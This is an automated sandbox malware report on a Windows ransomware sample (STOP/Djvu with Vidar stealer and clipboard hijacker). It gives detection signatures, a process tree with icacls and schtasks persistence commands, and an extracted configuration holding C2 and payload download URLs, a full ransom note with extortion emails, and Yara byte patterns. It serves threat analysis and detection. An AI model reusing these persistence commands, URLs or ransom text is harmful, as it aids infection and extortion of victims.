Edit tour

Windows Analysis Report
sIQywRNC5M.exe

Overview

General Information

Sample name:	sIQywRNC5M.exe renamed because original name is a hash value
Original sample name:	03cea6f6022a3a08d1ea003091a3e502.exe
Analysis ID:	1431081
MD5:	03cea6f6022a3a08d1ea003091a3e502
SHA1:	643e34573258d1511921c8d97a5b3c26d6c70b62
SHA256:	2f48e39c1fa623b569c7580066026dc25e629fcd4a9cdb8a58d22e45c9eb99c2
Tags:	exeStop
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Babuk Ransomware

Yara detected Clipboard Hijacker

Yara detected Djvu Ransomware

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

sIQywRNC5M.exe (PID: 5896 cmdline: "C:\Users\user\Desktop\sIQywRNC5M.exe" MD5: 03CEA6F6022A3A08D1EA003091A3E502)

sIQywRNC5M.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\sIQywRNC5M.exe" MD5: 03CEA6F6022A3A08D1EA003091A3E502)

icacls.exe (PID: 5720 cmdline: icacls "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

sIQywRNC5M.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask MD5: 03CEA6F6022A3A08D1EA003091A3E502)

sIQywRNC5M.exe (PID: 4220 cmdline: "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask MD5: 03CEA6F6022A3A08D1EA003091A3E502)

build2.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe" MD5: A04031208441077A014F42095FF86107)

build2.exe (PID: 5748 cmdline: "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe" MD5: A04031208441077A014F42095FF86107)

build3.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

build3.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 3116 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sIQywRNC5M.exe (PID: 4160 cmdline: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task MD5: 03CEA6F6022A3A08D1EA003091A3E502)

sIQywRNC5M.exe (PID: 1476 cmdline: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task MD5: 03CEA6F6022A3A08D1EA003091A3E502)

mstsca.exe (PID: 5308 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 2316 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 3816 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sIQywRNC5M.exe (PID: 2928 cmdline: "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart MD5: 03CEA6F6022A3A08D1EA003091A3E502)

sIQywRNC5M.exe (PID: 3580 cmdline: "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart MD5: 03CEA6F6022A3A08D1EA003091A3E502)

mstsca.exe (PID: 6276 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 5748 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

sIQywRNC5M.exe (PID: 2624 cmdline: "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart MD5: 03CEA6F6022A3A08D1EA003091A3E502)

sIQywRNC5M.exe (PID: 3808 cmdline: "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart MD5: 03CEA6F6022A3A08D1EA003091A3E502)

mstsca.exe (PID: 5912 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 3876 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 6148 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 6400 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 1960 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0Ftq9GtunuzQZHGiqoG\\\\n8S4cMO\\/Bdgsd+jTtFbVs1bX4OXiYKnMXg4LclKMEHJ2gnP2X09BkzA29UJQlagak\\\\nuAL7j7iRagKeU4tAB8w9rziBYoa9zROqer7J6pf5B11vAvvRq4b3127kAxnMhpgo\\\\ns7MQC7pXIvTkEeGySeG+F5fjSMPUoF1\\/cAg6GuSWOPXoPvXKRA\\/mo+xyHVOKZe2+\\\\nSCpbMHAyMe7o4w\\/i\\/pVjv9g8pRDJtz14qtMuAR38ek+SPJ4PJCxA9e0tOi+p4yNn\\\\nvnFKoL5OwzoF+bvVHnTA7tk4fXB3AyaL9llS0kxEWS7x\\/kNYQyJPh9fimryM03Cy\\\\n1wIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000010.00000002.2309758301.0000000000BBC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x773c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000015.00000002.2542639279.0000000004436000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000006.00000002.2072615613.000000000459B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001B.00000002.3341836401.0000000000A60000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6fb4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.2729646058.0000000000910000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x70a4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
